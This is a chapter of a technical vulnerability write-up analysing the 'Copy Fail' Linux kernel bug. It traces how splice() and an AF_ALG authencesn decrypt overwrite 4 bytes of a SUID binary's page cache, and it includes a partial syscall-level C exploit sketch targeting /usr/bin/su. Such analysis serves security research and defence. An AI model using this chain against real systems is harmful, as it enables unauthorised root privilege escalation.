4 Vulnerability Anatomy
4.1 Vulnerability Overview
At a high level, this bug lets an unprivileged user modify a few bytes of a root-owned executable "file", even though that file was only supposed to be read, not written.
The trick is that the write does not go through the normal filesystem write path at all. Instead, attacker makes the kernel treat file-backed pages as part of a crypto request, and then relies on a buggy decrypt path to write 4 controlled bytes past, which is the in-memory backing page cache later reused by execve().
So the bug is the opposite of copying, instead:
- the target file page is first borrowed into a pipe by the zero-copy
splice()path, - that page is then reused inside an
AF_ALGAEAD decrypt request, - and the selected buggy
authencesn()decrypt implementation writes 4 bytes into the wrong place.
If the chosen target is a SUID binary such as /usr/bin/su, corrupting its cached executable bytes is enough to turn a decrypt request into local privilege escalation. Even though that request may fail — but it does not matter.
4.2 Copy Fail Exploit Chain
After a deep dive through the Linux kernel, the exploit chain becomes easier to read. Each step below links back to the section where that mechanism was introduced.
- Pick a file-backed executable target whose bytes are served through the page cache. For privilege escalation, the target can be a
root-owned SUID binary such as/usr/bin/su. - Open an
AF_ALGAEAD socket path forauthencesn(hmac(sha256),cbc(aes)), so a laterrecvmsg()reaches the selectedauthencesn()decrypt path. - Use
sendmsg()to queue attacker-controlledAAD. Bytes4..7of that AAD becomeseqno_lo, the 4-byte value later written bycrypto_authenc_esn_decrypt()during the "OOB" scatterlist walk. - Use
splice(file -> pipe)so the pipe holds apipe_bufferreferencing the target file's cached page, rather than a private copied buffer. - Use the
pipe -> socketsplice path so that same pipe-backed page is forwarded throughsplice_to_socket(). Internally, the pipe buffer becomes abio_vec, then a page-backedmsg_itermarked withMSG_SPLICE_PAGES. - On the accepted
AF_ALGoperation socket,af_alg_sendmsg()handles theMSG_SPLICE_PAGESpayload and converts the page-backed iterator into the AEAD TX scatterlist. At this point, the target file's page-cache page has entered the crypto request path. - Let
_aead_recvmsg()build the decrypt request scatterlist: the valid RX output head is backed by the caller's receive buffer, while the preserved TX tag tail can still point at the spliced file-backed page. - Trigger decrypt with
recvmsg(). On theauthencesn()decrypt path, the kernel performs the destination-side scratch write atassoclen + cryptlen. - Because
scatterwalkfollows the chained scatterlist mechanically, that 4-byte write crosses the valid decrypt output boundary and lands in the next chained entry, which is backed by the target file's page-cache page. - The decrypt operation fails authentication and returns an error, but the 4-byte overwrite remains in page cache. A later
execve()of the target binary consumes the corrupted executable bytes.
Chained from the kernel perspective:
Exploit chain
════════════════════════════════════════════════════════════
1. choose target
root-owned SUID executable
e.g. /usr/bin/su
│
▼
2. file page enters pipe
splice(file -> pipe)
pipe_buffer references cached file page
│
▼
3. pipe page enters socket send path
splice(pipe -> socket)
pipe_buffer -> bio_vec -> msg_iter
MSG_SPLICE_PAGES
│
▼
4. page enters AF_ALG TX scatterlist
af_alg_sendmsg()
extract_iter_to_sg()
│
▼
5. attacker-controlled AAD is queued
AAD[4:8] = seqno_lo
4-byte value to be written later
│
▼
6. decrypt request is built
_aead_recvmsg()
RX output head + chained TX tag tail
│
▼
7. authencesn decrypt runs
crypto_authenc_esn_decrypt()
│
▼
8. destination-side scratch write
scatterwalk_map_and_copy(...,
dst,
assoclen + cryptlen,
4,
out = 1)
│
▼
9. scatterwalk follows sg_next()
valid RX output -> chained TX tag entry
│
▼
10. page-cache overwrite
4 attacker-controlled bytes land in cached file page
│
▼
11. later execve()
kernel executes corrupted cached executable bytesIn compact form:
SUID file page →
splice(file -> pipe)→pipe_bufferrefs cached page →splice(pipe -> socket)→msg_iterwithMSG_SPLICE_PAGES→AF_ALGTX scatterlist → TX tag tail chained after RX output → authencesn scratch write @assoclen+cryptlen→ scatterwalk followssg_next()→ 4-byte page-cache overwrite → laterexecve()runs corrupted cached executable bytes
4.3 Vulnerable Execution Path
This section closes the last gap left at the end of Chapter 3. We already proved the algorithm-side write in authencesn(); now we follow one target file page until it becomes the chained TX-side scatterlist entry that sits behind the decrypt boundary.
4.3.1 File-to-pipe Page Installation
The first half of the primitive comes from the regular-file splice() path:
splice()→do_splice()→splice_file_to_pipe()→do_splice_read()→filemap_splice_read()→splice_folio_into_pipe()
The important effect is that splice_folio_into_pipe() creates a struct pipe_buffer that directly references the file-backed page-cache page:
*buf = (struct pipe_buffer) {
.ops = &page_cache_pipe_buf_ops,
.page = page, // cached file page
.offset = offset, // target file offset on page
.len = part,
};So after splice(file -> pipe), the pipe does not hold an anonymous copy of the file data. It holds a pipe-buffer entry pointing at the cached file page itself.
target file offset
|
v
cached file page in page cache (folio/page)
|
v
pipe buffer references that pageThat gives the first half of the primitive:
target file offset -> cached file page -> pipe buffer referenceAt this point, no corruption has happened yet. The only state we have is a file-backed page-cache page represented by a pipe buffer. The next question is how that pipe buffer reaches the AF_ALG request path.
4.3.2 Pipe Page Into TX Scatterlist
The pipe now references a cached file page. The exploit needs that same page reference to become crypto input, so the next step is splice(pipe -> AF_ALG socket).
That handoff happens when pipe data is spliced into the accepted AF_ALG operation socket. In splice_to_socket(), the kernel consumes pipe buffers and describes their backing pages as bio_vec entries, described in fs/splice.c:869-891:
struct pipe_buffer *buf = &pipe->bufs[tail & mask]; // pipe buffer
...
bvec_set_page(
&bvec[bc++],
buf->page, // page referenced by pipe_buffer
seg, // length
buf->offset // offset inside that page
);
...
msg.msg_flags = MSG_SPLICE_PAGES; // [!]
...
ret = sock_sendmsg(sock, &msg);The important part is:
pipe_buffer page
|
v
bio_vec entry
|
v
socket sendmsg with MSG_SPLICE_PAGESSo the page is not copied into a normal userspace buffer. It is carried forward as a page-backed iterator into the socket send path.
For the accepted AF_ALG AEAD socket, sock_sendmsg() dispatches into aead_sendmsg(), which immediately forwards into af_alg_sendmsg():
sock_sendmsg()
|
v
aead_sendmsg()
|
v
af_alg_sendmsg()Inside af_alg_sendmsg(), the exploit-relevant path is selected by MSG_SPLICE_PAGES, described af_alg.c:1040-1061:
static int af_alg_sendmsg(struct socket *sock,
struct msghdr *msg, // sendmsg() message from user space
size_t size,
unsigned int ivsize)
{
...
// msg.msg_flags = MSG_SPLICE_PAGES
if (msg->msg_flags & MSG_SPLICE_PAGES) {
struct sg_table sgtable = {
.sgl = sg, // TX scatterlist
.nents = sgl->cur, // used entries
.orig_nents = sgl->cur,
};
// [!] conversion
plen = extract_iter_to_sg(
&msg->msg_iter, // spliced/page-backed iterator
len,
&sgtable, // append into sg table
MAX_SGL_ENTS - sgl->cur,
0
);
...
for (; sgl->cur < sgtable.nents; sgl->cur++)
get_page(sg_page(&sg[sgl->cur])); // keep page alive
...This is the conversion point:
pipe-backed iterator
|
v
extract_iter_to_sg()
|
v
AF_ALG TX scatterlist entrySo the full bridge is:
cached file page
|
v
pipe buffer references that page
|
v
splice_to_socket()
|
v
MSG_SPLICE_PAGES sendmsg
|
v
af_alg_sendmsg()
|
v
extract_iter_to_sg()
|
v
TX scatterlist entryAt this point, the target file page is no longer only sitting behind a pipe buffer. It has become part of the AEAD request's TX scatterlist. It is still only input, though; the write becomes possible only after _aead_recvmsg() builds the in-place decrypt layout.
file-backed page enters AEAD TX path
═══════════════════════════════════════════════
┌────────────────────────────┐
│ target file page cache │
│ /usr/bin/su @ offset X │
└──────────────┬─────────────┘
│ splice(file -> pipe)
▼
┌────────────────────────────┐
│ pipe buffer │
│ references cached page │
└──────────────┬─────────────┘
│ splice(pipe -> AF_ALG socket)
│ MSG_SPLICE_PAGES
▼
┌────────────────────────────┐
│ AF_ALG TX scatterlist │
│ sg entry references page │
└────────────────────────────┘4.3.3 Chained Decrypt Request Layout
Now the AF_ALG operation socket has both ingredients:
- attacker-controlled
AADsubmitted through the normalsendmsg()path; - file-backed TX scatterlist entries imported through the
MSG_SPLICE_PAGESpath.
_aead_recvmsg() is where those two ingredients are combined. It converts the queued TX state and the caller's RX buffer into the final AEAD decrypt request.
On the decrypt path, the construction happens in three steps:
- copy output-sized prefix: from TX (
AAD || ciphertext || tag) to RX (AAD || ciphertext) - preserve the left-over TX tag tail
tag - chain preserved tag after RX head: RX head → TX tag tail
In code, the important operations are:
crypto_aead_copy_sgl()copies the decrypt output-sized prefix into RX:AAD || ciphertext.af_alg_pull_tsgl()preserves the TX-side tag tail instead of copying it into the RX output region.sg_chain()links that preserved TX tail after the RX head.aead_request_set_crypt()andaead_request_set_ad()wire the finalstruct aead_request.
The final request shape is:
AEAD decrypt request
════════════════════════════════════════════════════
req->src ──▶ RX head ───────────────▶ TX tag tail
[ AAD || ciphertext ] [tag]
req->dst ──▶ RX head
[ AAD || plaintext ]
^
valid output ends hereThe exploit-relevant detail is the TX tag tail:
- preserved input tag region
- chained after the RX output head
- can still be backed by the spliced file page
This is the exact point where the file-backed page imported through the pipe becomes the next scatterlist entry after the valid decrypt output region. The page is now positioned behind the boundary; the remaining missing piece is a write that starts at that boundary.
4.3.4 Authencesn Scratch Write
The previous step leaves us with a decrypt request whose req->dst starts at the RX head, while the preserved TX tag tail is chained immediately after that valid output region. Nothing has been overwritten yet; _aead_recvmsg() has only constructed the shape.
The overwrite happens only when that prepared request is submitted to the selected AEAD implementation. In this path, crypto_aead_decrypt() dispatches the request into crypto_authenc_esn_decrypt(), the decrypt callback for authencesn(hmac(sha256),cbc(aes)).
The exploit-relevant lines are:
cryptlen -= authsize;
...
/*
* Read the first 8 bytes from dst into tmp.
*
* In this request layout, dst starts at the RX head,
* whose first bytes are the AAD.
*/
scatterwalk_map_and_copy(
tmp,
dst,
0,
8,
0 // read flag: scatterlist -> tmp
);
/*
* Write the lower 4 bytes back near the AAD area.
*/
scatterwalk_map_and_copy(
tmp,
dst,
4,
4,
1 // write flag: tmp -> scatterlist
);
/*
* Write the upper 4 bytes at the decrypt boundary.
*
* This is the Copy Fail write.
*/
scatterwalk_map_and_copy(
tmp + 1,
dst,
assoclen + cryptlen,
4,
1 // write flag: tmp -> scatterlist
);The first scatterwalk_map_and_copy() reads 8 bytes from the beginning of dst into tmp. Since req->dst starts at the RX head, and the RX head begins with the AAD, this captures:
tmp
┌────────────┬────────────┐
│ tmp[0] │ tmp[1] │
│ AAD[0:4] │ AAD[4:8] │
└────────────┴────────────┘So the attacker-controlled bytes staged in AAD[4:8] become tmp + 1.
Then authencesn() uses that tmp + 1 pointer as the source of the second scratch write:
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);That gives the value flow:
AAD[4:8] -> read into tmp[1] (tmp+1) -> 4-byte scratch write sourceThe offset side is separate. cryptlen is first reduced by the tag size:
cryptlen -= authsize;So at the time of the write:
cryptlen = ciphertext lengthand the destination offset becomes:
assoclen + cryptlen
= AAD length + ciphertext length
= end of valid decrypt outputTherefore the write operation is:
value = AAD[4:8]
target = dst @ assoclen + cryptlen
size = 4 bytesVisually:
valid decrypt output
┌────────────┬────────────────────┐
│ AAD │ plaintext │
└────────────┴────────────────────┘
^
│
AAD[4:8] is written here as 4 bytesBecause scatterwalk_map_and_copy() walks the destination scatterlist mechanically, the write does not stop just because the AEAD output boundary ends there. If the next scatterlist entry is chained after RX, sg_next() carries the write forward.
In this exploit path, that next entry is the preserved TX tag tail backed by the spliced file page. That completes the bridge from attacker-controlled AAD bytes to a page-cache-backed destination.
4.3.5 Page-cache Overwrite Primitive
Now the two halves meet. The previous step showed the write gadget:
scatterwalk_map_and_copy(
tmp + 1,
dst,
assoclen + cryptlen, // scatterlist walk oob
4, // bytes to write
1 // write flag
);From 4.3.4, the value comes from the AAD:
AAD[4:8] -> tmp + 1 -> 4-byte scratch write sourceBy itself, that is only a 4-byte destination-side scatterlist write. It becomes the Copy Fail primitive because of the request layout built earlier: dst starts at the RX output head, but the scatterlist does not stop there. After the valid decrypt output region, it continues into the preserved TX tag entry.
That preserved TX tag entry came from the spliced pipe path. Earlier, af_alg_sendmsg() imported the MSG_SPLICE_PAGES payload into the AEAD TX scatterlist, so the chained tag entry can still reference the target file's cached page.
Now the primitive is fully assembled:
- WHAT to write:
AAD[4:8]/seqno_lo
- HOW the write happens:
authencesnscratch writescatterwalk_map_and_copy(..., dst, assoclen + cryptlen, 4, out = 1)
- WHERE it lands:
- chained TX tag entry
- spliced file-backed page
So the write path is:
attacker input
──────────────
AAD[4:8] / seqno_lo
│
▼
authencesn scratch write
────────────────────────
scatterwalk_map_and_copy(tmp + 1,
dst,
assoclen + cryptlen,
4,
out = 1)
│
▼
scatterlist crossing
────────────────────
dst output boundary
│
▼
sg_next()
│
▼
preserved TX tag entry
│
▼
file-backed page-cache pageThis is the core Copy Fail primitive: a 4-byte attacker-controlled value is written through the AEAD destination scatterlist into a page-cache-backed entry.
The important point is that userspace never performs a normal write() to the target file. The file page is first imported through splice(), then carried into the AF_ALG TX scatterlist, and finally overwritten by the kernel-side authencesn scratch write.
To achieve write-what-where, we need to understand the syscall shape below which is the userspace way to arrange those kernel states.
4.3.6 Syscall-level Primitive
At the syscall level, the primitive is not a normal file write. Userspace only arranges two things:
- the 4-byte value to write, staged through
AAD[4:8] - the file-backed target page, staged through
splice()
Then it triggers the kernel-side decrypt path.
A sketch for the exploit workflow:
/*
* This is a syscall-level sketch, not a complete standalone exploit.
* Key setup, authsize setup, IV/control messages, exact offsets, and
* error handling are intentionally collapsed so primitive shape stays visible.
*/
/* 1. Open the AF_ALG AEAD transform. */
int tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
};
bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa));
/*
* 2. Configure key/authsize, then accept the operation socket.
*
* setsockopt(tfm_fd, SOL_ALG, ALG_SET_KEY, ...);
* setsockopt(tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, ...);
*/
int op_fd = accept(tfm_fd, NULL, NULL);
/*
* Victim target:
*
* The first splice selects the target file-backed page that we want
* to carry into the pipe, and later into the AF_ALG TX scatterlist.
*/
char *victim = "/usr/bin/su";
int target_file_fd = open(victim, O_RDONLY);
off_t target_file_offset = 0x1234; /* victim file/page selection offset */
size_t splice_len = 0x1000; /* enough bytes for the planned TX layout */
int pipe_fds[2];
pipe(pipe_fds);
/*
* 3. Queue attacker-controlled AAD.
*
* AAD[4:8] becomes seqno_lo.
* authencesn later writes these 4 bytes through:
*
* scatterwalk_map_and_copy(tmp + 1,
* dst,
* assoclen + cryptlen,
* 4,
* 1);
*/
uint8_t write_value[4] = { 'P', 'W', 'N', '!' };
uint8_t aad[8];
memset(aad, 'A', 4); /* AAD[0:4] */
memcpy(aad + 4, write_value, 4); /* AAD[4:8] = seqno_lo */
struct iovec aad_iov = {
.iov_base = aad,
.iov_len = sizeof(aad),
};
struct msghdr aad_msg = {
.msg_iov = &aad_iov,
.msg_iovlen = 1,
.msg_control = cmsg_buf, /* ALG_SET_OP / ALG_SET_AEAD_ASSOCLEN / IV */
.msg_controllen = cmsg_len,
};
/*
* MSG_MORE keeps the AF_ALG request open so more input can be appended.
*/
sendmsg(op_fd, &aad_msg, MSG_MORE);
/*
* 4. Splice the target file page into a pipe.
*
* Kernel-side effect:
*
* target file page cache
* -> pipe_buffer
*/
splice(
target_file_fd,
&target_file_offset,
pipe_fds[1],
NULL,
splice_len,
0
);
/*
* 5. Splice the pipe into the AF_ALG operation socket.
*
* Kernel-side effect:
*
* pipe_buffer
* -> bio_vec
* -> msg_iter marked MSG_SPLICE_PAGES
* -> AF_ALG TX scatterlist
*/
splice(
pipe_fds[0],
NULL,
op_fd,
NULL,
splice_len,
0
);
/*
* 6. Trigger decrypt.
*
* rx_buf is the normal caller-provided receive buffer.
*
* _aead_recvmsg() builds:
*
* RX output head -> preserved TX tag tail
*
* Then authencesn performs the destination-side scratch write.
*/
recv(op_fd, rx_buf, rx_len, 0);The exact offset choreography is handled later (see 5.2). For now, the important mapping is:
target_file_offset→ selects file-backed page entering pipeAF_ALGdecrypt layout → positions that page inside the preserved TX tag tailassoclen + cryptlen→ makes the authencesn scratch write land at the RX/TX chain boundary
Read as one execution stream:
controlled AAD[4:8]
│
│ sendmsg()
▼
AF_ALG request input
│
│ splice(file -> pipe)
▼
pipe references target page-cache page
│
│ splice(pipe -> AF_ALG socket)
▼
AF_ALG TX scatterlist contains page-backed entry
│
│ recv()
▼
_aead_recvmsg() chains TX tag tail after RX output
│
│ authencesn decrypt
▼
AAD[4:8] written at dst @ assoclen + cryptlenThe decrypt may fail authentication, but that failure is not a rollback point. The scratch write has already happened.
4.3.7 Execution from Corrupted Cache
After the overwrite, the target file's page-cache page contains modified bytes. For an executable file, later execve() may consume those cached bytes as instruction data.
For a root-owned SUID target, that means:
4-byte page-cache overwrite
│
▼
corrupted executable page
│
▼
later execve()
│
▼
modified code runs in SUID program contextAt this point, the remaining exploit work is to place attacker-controlled patch bytes into the victim file's page-cache page.
In Chapter 7, we will finally turn this primitive into working exploit implementations across different languages — right after a quick PoC to understand how to construct an exploit (Chapter 5) with some runtime debugging evidence demonstration (Chapter 6).
Comments | NOTHING